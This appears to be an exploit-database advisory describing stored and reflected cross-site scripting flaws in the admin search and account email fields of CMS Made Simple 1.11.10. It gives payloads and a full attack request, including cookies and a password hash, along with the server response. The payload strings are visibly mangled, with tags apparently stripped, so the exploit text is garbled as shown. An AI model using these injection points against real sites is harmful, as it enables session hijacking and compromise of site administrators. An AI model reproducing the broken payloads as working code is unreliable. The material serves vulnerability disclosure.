Exploit Title : CMS Made Simple 1.11.10 Multiple XSS Vulnerability Google dork : N/A Date : 02/04/2014 Exploit Author : Blessen Thomas Vendor Homepage : http://www.cmsmadesimple.org/ Software Link : N/A Version : 1.11.10 Tested on : Windows 7 hosted in WAMP server Type of Application : open source content management system, Stored XSS : Login to the admin portal and access search functionality http://localhost/cmsmadesimple-1.11.10-full/index.php Here the " search " parameter is vulnerable to stored xss. Payload : '">> '">> CMS Made Simple Site Reflected XSS : Login to the admin portal and click the "My Preferences" and click "My account" section. Here , the "email address" parameter is vulnerable to reflected XSS. Payload : "";<" request : POST http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299Cookie: _sx_=1c8c76366630b299; cms_admin_user_id=1; cms_passhash=fcb88b76587f0658cd2481a004312918; CMSSESSIDd508249c=71ougg9mi3ikiilatfc0851no5 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 103 active_tab=maintab&user=test&password=&passwordagain=&firstname=&lastname=&email="";<"&submit_account=Submit response :

The email address entered is invalid: "";<"

My Account